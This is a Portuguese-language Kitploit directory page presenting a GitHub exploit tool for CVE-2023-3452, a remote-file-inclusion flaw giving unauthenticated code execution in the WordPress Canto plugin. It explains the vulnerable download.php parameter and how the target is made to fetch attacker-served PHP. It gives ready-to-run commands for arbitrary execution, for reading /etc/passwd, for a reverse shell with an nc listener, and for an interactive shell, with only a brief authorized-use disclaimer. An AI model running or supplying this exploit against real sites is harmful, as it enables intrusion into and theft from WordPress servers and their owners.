Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — Exploit CVE-2023-3452 para o plugin Canto do WordPress RCE, suporte HTTPS incluído | Kitploit
Ferramentas/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

Exploit CVE-2023-3452 para o plugin Canto do WordPress RCE, suporte HTTPS incluído

Ver Repositório
1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-3452 - Plugin Canto WordPress RCE

Exploit para a vulnerabilidade de RFI no Plugin Canto WordPress (≤ 3.0.4). Funciona de fato em HTTPS — os outros PoCs públicos meio que desistiram do SSL.

Crédito onde é devido: esta CVE foi encontrada por outros. Apenas fiz uma versão que não quebra em alvos HTTPS.

Vulnerabilidade

CVECVE-2023-3452
EDB-ID51826
TipoRemote File Inclusion (RFI) → RCE não autenticado
AfetadosPlugin Canto WordPress < 3.0.5 (≤ 3.0.4)
Divulgado porLeopoldo Angulo (leoanggal1) — 27-02-2024
Localização/wp-content/plugins/canto/includes/lib/download.php
Vetorwp_abspath é usado para incluir arquivos PHP sem nenhuma validação — nós incluímos o nosso remotamente.

Por que este?

A maioria dos exploits para esta CVE falha em HTTPS por causa da verificação SSL. Este script:

  • Usa verify=False para que alvos HTTPS funcionem de fato
  • Suprime o spam de avisos do urllib3
  • Funciona igualmente em HTTP e HTTPS — sem necessidade de configuração separada

Requisitos

  • Python 3.6+
  • requests

Instalação

root@kitploit:~
pip install -r requirements.txt

Ou apenas: pip install requests

Uso

root@kitploit:~
python3 canto_exploit.py -t <URL_ALVO> -l <LHOST> -p <LPORT> [OPÇÕES]

Argumentos

OpçãoDescriçãoObrigatório
-t, --targetURL do WordPress alvo (HTTP ou HTTPS)Sim
-l, --lhostSeu IP — o alvo precisa alcançá-lo para o payloadSim
-p, --lportPorta do servidor do payload (padrão: 8888)Não
-c, --commandComando a executar no alvoNão*
--revshellGerar reverse shellNão
--shell-portPorta do listener para o reverse shell (padrão: 4444)Não
-i, --interactiveModo shell interativoNão
-v, --verboseSaída extraNão
--skip-checkPular a verificação de vulnerabilidadeNão

* Nenhum comando = executa id; whoami; hostname como verificação de sanidade

Exemplos

Comando único:

root@kitploit:~
python3 canto_exploit.py -t https://alvo.com -l 10.10.14.33 -p 8888 -c "id"

Ler um arquivo:

root@kitploit:~
python3 canto_exploit.py -t https://alvo.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

Reverse shell (execute nc -lvnp 4444 primeiro):

root@kitploit:~
python3 canto_exploit.py -t https://alvo.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

Modo interativo:

root@kitploit:~
python3 canto_exploit.py -t https://alvo.com -l 10.10.14.33 -p 8888 -i

Alvo CTF HTTPS:

root@kitploit:~
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

Como Funciona

  1. Verificação — Acessa /wp-content/plugins/canto/readme.txt, analisa a versão (≤ 3.0.4 = vulnerável)
  2. Payload — Escreve um falso wp-admin/admin.php que executa seu comando via system()
  3. Servir — Inicia um servidor HTTP local para que o alvo possa buscar nosso arquivo
  4. Disparar — Requisita download.php com wp_abspath=http://LHOST:LPORT para que ele inclua nosso PHP remoto
  5. Executar — O servidor deles executa nosso código, recebemos a saída de volta

Notas de Rede

  • O alvo deve ser capaz de alcançar sua máquina em LHOST:LPORT (para HTB/labs, esse é o seu IP VPN)
  • O firewall precisa permitir tráfego de entrada na porta do payload (-p)

Aviso

Apenas testes autorizados e educação. Só toque em sistemas que você tem permissão. Qualquer outra coisa é ilegal.

Licença

MIT

Baixar ferramenta